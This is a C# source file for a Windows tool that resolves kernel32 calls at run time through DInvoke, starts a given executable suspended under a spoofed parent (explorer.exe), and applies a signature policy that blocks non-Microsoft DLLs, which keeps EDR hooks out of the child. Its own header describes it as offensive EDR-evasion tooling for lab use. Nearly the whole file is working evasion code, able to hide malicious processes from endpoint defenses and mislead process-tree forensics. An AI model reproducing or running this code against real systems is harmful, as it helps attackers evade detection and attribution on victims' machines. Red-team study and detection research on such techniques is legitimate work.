PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
namespace DInvoke_PIDSpoof_DevNuget
{
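/// <summary>
/// Parent-PID spoofing demo built on DInvoke: the target image is started as a
/// (suspended) child of explorer.exe, with a binary-signature mitigation policy
/// that blocks non-Microsoft / non-Store DLLs from loading into the child. Every
/// Win32 call is resolved at run time through DInvoke; nothing is P/Invoked
/// statically. This is offensive tooling (EDR evasion); run it only in a lab.
/// </summary>
class Program
{
    // PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY must be given a DWORD64 when the policy
    // bits used lie above bit 32 (ours are at 0x..0000_0000_0000 << 44), so the value
    // buffer is always 8 bytes, independent of the pointer size of this process.
    private const int MitigationPolicyValueSize = sizeof(ulong);

    // Two attributes are placed in the list: the mitigation policy and the parent process.
    private const int AttributeCount = 2;

    /// <summary>
    /// Resolves one kernel32.dll export through DInvoke and invokes it with the given
    /// delegate signature. Keeps the repeated GetLibraryAddress/DynamicFunctionInvoke
    /// pair in one place.
    /// </summary>
    /// <param name="export">Name of the kernel32 export.</param>
    /// <param name="delegateType">A DELEGATES type matching the export's signature.</param>
    /// <param name="parameters">Boxed arguments; ref/out parameters are written back into the array.</param>
    /// <returns>The boxed native return value.</returns>
    private static object CallKernel32(string export, Type delegateType, ref object[] parameters)
    {
        IntPtr address = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", export, false, true);
        if (address == IntPtr.Zero)
        {
            throw new EntryPointNotFoundException("kernel32.dll!" + export + " could not be resolved");
        }
        return DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(address, delegateType, ref parameters);
    }

    /// <summary>
    /// Starts args[0] as a suspended child whose recorded parent is explorer.exe.
    /// Any failure to set up the attribute list aborts the launch instead of starting
    /// the child without the spoofed parent or the mitigation policy. On success the
    /// new PID is printed; the child stays suspended (CREATE_SUSPENDED) and its
    /// hProcess/hThread handles are not closed here - the process exits right after.
    /// </summary>
    /// <param name="args">args[0]: full path of the image to start (passed as lpApplicationName, so no PATH search and no command line).</param>
    static void Main(string[] args)
    {
        if (args == null || args.Length == 0 || string.IsNullOrWhiteSpace(args[0]))
        {
            Console.Error.WriteLine("usage: <full path to executable>");
            return;
        }

        var startInfoEx = new STRUCTS.STARTUPINFOEX();
        // cb must be sizeof(STARTUPINFOEX) when EXTENDED_STARTUPINFO_PRESENT is used.
        startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);
        var processInfo = new STRUCTS.PROCESS_INFORMATION();

        // UpdateProcThreadAttribute stores the *pointer* to each value; the buffers are
        // read by CreateProcess, so both must stay allocated until after that call.
        IntPtr mitigationValue = IntPtr.Zero;
        IntPtr parentHandleValue = IntPtr.Zero;
        // Owns the explorer.exe handle; disposing it closes the handle, so it is kept
        // alive until CreateProcess has returned.
        Process parent = null;
        bool attributeListInitialized = false;
        bool created = false;

        try
        {
            var processSecurity = new STRUCTS.SECURITY_ATTRIBUTES();
            var threadSecurity = new STRUCTS.SECURITY_ATTRIBUTES();
            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength = Marshal.SizeOf(threadSecurity);

            // Size query: with a null list this call returns FALSE (ERROR_INSUFFICIENT_BUFFER)
            // by design and only fills lpSize, so its boolean result is deliberately ignored.
            object[] sizeQuery = { IntPtr.Zero, AttributeCount, 0, IntPtr.Zero };
            CallKernel32("InitializeProcThreadAttributeList", typeof(DELEGATES.InitializeProcThreadAttributeList), ref sizeQuery);
            IntPtr listSize = (IntPtr)sizeQuery[3];
            if (listSize == IntPtr.Zero)
            {
                throw new InvalidOperationException("InitializeProcThreadAttributeList did not report a buffer size");
            }

            startInfoEx.lpAttributeList = Marshal.AllocHGlobal(listSize);
            object[] initParams = { startInfoEx.lpAttributeList, AttributeCount, 0, listSize };
            if (!(bool)CallKernel32("InitializeProcThreadAttributeList", typeof(DELEGATES.InitializeProcThreadAttributeList), ref initParams))
            {
                throw new InvalidOperationException("InitializeProcThreadAttributeList failed");
            }
            attributeListInitialized = true;

            // Attribute 1: PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE.
            // The child will refuse to load DLLs that are not Microsoft- or Store-signed, which
            // keeps third-party user-mode hooks out of it - and equally blocks any unsigned DLL
            // of your own. Written as a 64-bit value so it is correct on x86 as well as x64.
            mitigationValue = Marshal.AllocHGlobal(MitigationPolicyValueSize);
            Marshal.WriteInt64(mitigationValue, (long)STRUCTS.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE);
            object[] mitigationParams =
            {
                startInfoEx.lpAttributeList, (uint)0,
                (IntPtr)(int)STRUCTS.ProcThreadAttribute.MITIGATION_POLICY,
                mitigationValue, (IntPtr)MitigationPolicyValueSize,
                IntPtr.Zero, IntPtr.Zero
            };
            if (!(bool)CallKernel32("UpdateProcThreadAttribute", typeof(DELEGATES.UpdateProcThreadAttribute), ref mitigationParams))
            {
                // NOTE: GetLastWin32Error only reflects the native error if the delegate
                // type was declared with SetLastError = true; otherwise it may be stale.
                throw new InvalidOperationException("UpdateProcThreadAttribute(MITIGATION_POLICY) failed, error " + Marshal.GetLastWin32Error());
            }

            // Attribute 2: PROC_THREAD_ATTRIBUTE_PARENT_PROCESS -> explorer.exe.
            // Process.Handle opens the target with broad access rights; CreateProcess itself
            // needs PROCESS_CREATE_PROCESS on that handle - verify this in restricted contexts.
            Process[] explorers = Process.GetProcessesByName("explorer");
            if (explorers.Length == 0)
            {
                throw new InvalidOperationException("no explorer.exe process found to use as parent");
            }
            parent = explorers[0];
            for (int i = 1; i < explorers.Length; i++)
            {
                explorers[i].Dispose();
            }
            parentHandleValue = Marshal.AllocHGlobal(IntPtr.Size);
            Marshal.WriteIntPtr(parentHandleValue, parent.Handle);
            object[] parentParams =
            {
                startInfoEx.lpAttributeList, (uint)0,
                (IntPtr)(int)STRUCTS.ProcThreadAttribute.PARENT_PROCESS,
                parentHandleValue, (IntPtr)IntPtr.Size,
                IntPtr.Zero, IntPtr.Zero
            };
            if (!(bool)CallKernel32("UpdateProcThreadAttribute", typeof(DELEGATES.UpdateProcThreadAttribute), ref parentParams))
            {
                throw new InvalidOperationException("UpdateProcThreadAttribute(PARENT_PROCESS) failed, error " + Marshal.GetLastWin32Error());
            }

            // CreateProcessA with no command line, no inherited handles, no custom environment.
            // Note that the calling thread still belongs to this process, so telemetry keyed on
            // the creator (rather than the recorded parent) can still attribute the launch here.
            object[] createParams =
            {
                args[0], null, processSecurity, threadSecurity, false,
                STRUCTS.CreationFlags.ExtendedStartupInfoPresent | STRUCTS.CreationFlags.CreateSuspended,
                IntPtr.Zero, null, startInfoEx, processInfo
            };
            created = (bool)CallKernel32("CreateProcessA", typeof(DELEGATES.CreateProcess), ref createParams);
            // The out parameter is written back into the boxed argument array.
            processInfo = (STRUCTS.PROCESS_INFORMATION)createParams[9];
            if (!created)
            {
                throw new InvalidOperationException("CreateProcessA failed, error " + Marshal.GetLastWin32Error());
            }
        }
        catch (Exception e)
        {
            Console.Error.WriteLine(e);
        }
        finally
        {
            // Cleanup must not throw and must run whether or not the launch succeeded.
            if (attributeListInitialized)
            {
                try
                {
                    object[] deleteParams = { startInfoEx.lpAttributeList };
                    CallKernel32("DeleteProcThreadAttributeList", typeof(DELEGATES.DeleteProcThreadAttributeList), ref deleteParams);
                }
                catch (Exception e)
                {
                    Console.Error.WriteLine(e.Message);
                }
            }
            if (startInfoEx.lpAttributeList != IntPtr.Zero)
            {
                Marshal.FreeHGlobal(startInfoEx.lpAttributeList);
            }
            if (mitigationValue != IntPtr.Zero)
            {
                Marshal.FreeHGlobal(mitigationValue);
            }
            if (parentHandleValue != IntPtr.Zero)
            {
                Marshal.FreeHGlobal(parentHandleValue);
            }
            if (parent != null)
            {
                parent.Dispose();
            }
        }

        if (created)
        {
            Console.WriteLine("{0} started", processInfo.dwProcessId);
        }
    }
}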
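/// <summary>
/// Native Win32 structures and constants used by Program. Field order and types
/// mirror the definitions in processthreadsapi.h / winbase.h so that
/// LayoutKind.Sequential produces the native layout on both x86 and x64.
/// </summary>
class STRUCTS
{
    /// <summary>
    /// PROCESS_INFORMATION as filled by CreateProcess. hProcess and hThread are
    /// owned by the caller and must eventually be closed with CloseHandle.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    /// <summary>
    /// STARTUPINFO. cbReserved corresponds to the native cbReserved2 and hStdErr to
    /// hStdError; the names differ but the layout is the native one.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFO
    {
        public uint cb;
        public IntPtr lpReserved;
        public IntPtr lpDesktop;
        public IntPtr lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttributes;
        public uint dwFlags;
        public ushort wShowWindow;
        public ushort cbReserved;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdErr;
    }

    /// <summary>
    /// STARTUPINFOEX. StartupInfo.cb must be set to sizeof(STARTUPINFOEX) and
    /// EXTENDED_STARTUPINFO_PRESENT passed for lpAttributeList to be honoured.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX
    {
        public STARTUPINFO StartupInfo;
        public IntPtr lpAttributeList;
    }

    /// <summary>SECURITY_ATTRIBUTES; nLength must be set to the struct size before use.</summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        public int bInheritHandle;
    }

    /// <summary>
    /// Attribute identifiers for UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_*).
    /// These are plain identifiers, not bit flags - they share bit 0x20000 and are
    /// never combined - so the enum is intentionally not marked [Flags].
    /// </summary>
    public enum ProcThreadAttribute : int
    {
        /// <summary>PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY.</summary>
        MITIGATION_POLICY = 0x20007,
        /// <summary>PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.</summary>
        PARENT_PROCESS = 0x00020000
    }

    /// <summary>
    /// PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_* values
    /// (a 2-bit field at bit 44 of the DWORD64 policy). The two values overlap, so
    /// they are alternatives rather than combinable flags.
    /// </summary>
    public enum BinarySignaturePolicy : ulong
    {
        /// <summary>Only Microsoft-signed DLLs may load into the child.</summary>
        BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000,
        /// <summary>Microsoft-signed and Store-signed DLLs may load into the child.</summary>
        BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000
    }

    /// <summary>CreateProcess dwCreationFlags; these are genuine bit flags and may be OR-ed.</summary>
    [Flags]
    public enum CreationFlags : uint
    {
        CreateSuspended = 0x00000004,
        DetachedProcess = 0x00000008,
        CreateNoWindow = 0x08000000,
        ExtendedStartupInfoPresent = 0x00080000
    }
}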
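/// <summary>
/// Delegate signatures handed to DInvoke's DynamicFunctionInvoke. Every delegate is
/// declared with SetLastError = true so that Marshal.GetLastWin32Error() returns the
/// native GetLastError value captured right after the call (without it the value is
/// stale), and with CharSet.Ansi because only the A-suffixed exports
/// (CreateProcessA, GetProcAddress, LoadLibraryA) are resolved by Program.
/// </summary>
class DELEGATES
{
    [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Ansi, SetLastError = true)]
    public delegate IntPtr GetProcAddress(IntPtr hModule, String lpProcName);

    [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Ansi, SetLastError = true)]
    public delegate IntPtr LoadLibrary(string dllToLoad);

    /// <summary>lpSize is a SIZE_T (pointer-sized), hence ref IntPtr; the null-list size query returns FALSE by design.</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall, SetLastError = true)]
    public delegate bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

    /// <summary>Attribute and cbSize are DWORD_PTR / SIZE_T, hence IntPtr; lpValue must stay valid until CreateProcess returns.</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall, SetLastError = true)]
    public delegate bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

    /// <summary>CreateProcessA; lpStartupInfo is STARTUPINFOEX, so EXTENDED_STARTUPINFO_PRESENT must be in dwCreationFlags.</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Ansi, SetLastError = true)]
    public delegate bool CreateProcess(string lpApplicationName, string lpCommandLine, ref STRUCTS.SECURITY_ATTRIBUTES lpProcessAttributes, ref STRUCTS.SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, STRUCTS.CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STRUCTS.STARTUPINFOEX lpStartupInfo, out STRUCTS.PROCESS_INFORMATION lpProcessInformation);

    [UnmanagedFunctionPointer(CallingConvention.StdCall, SetLastError = true)]
    public delegate bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
}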
}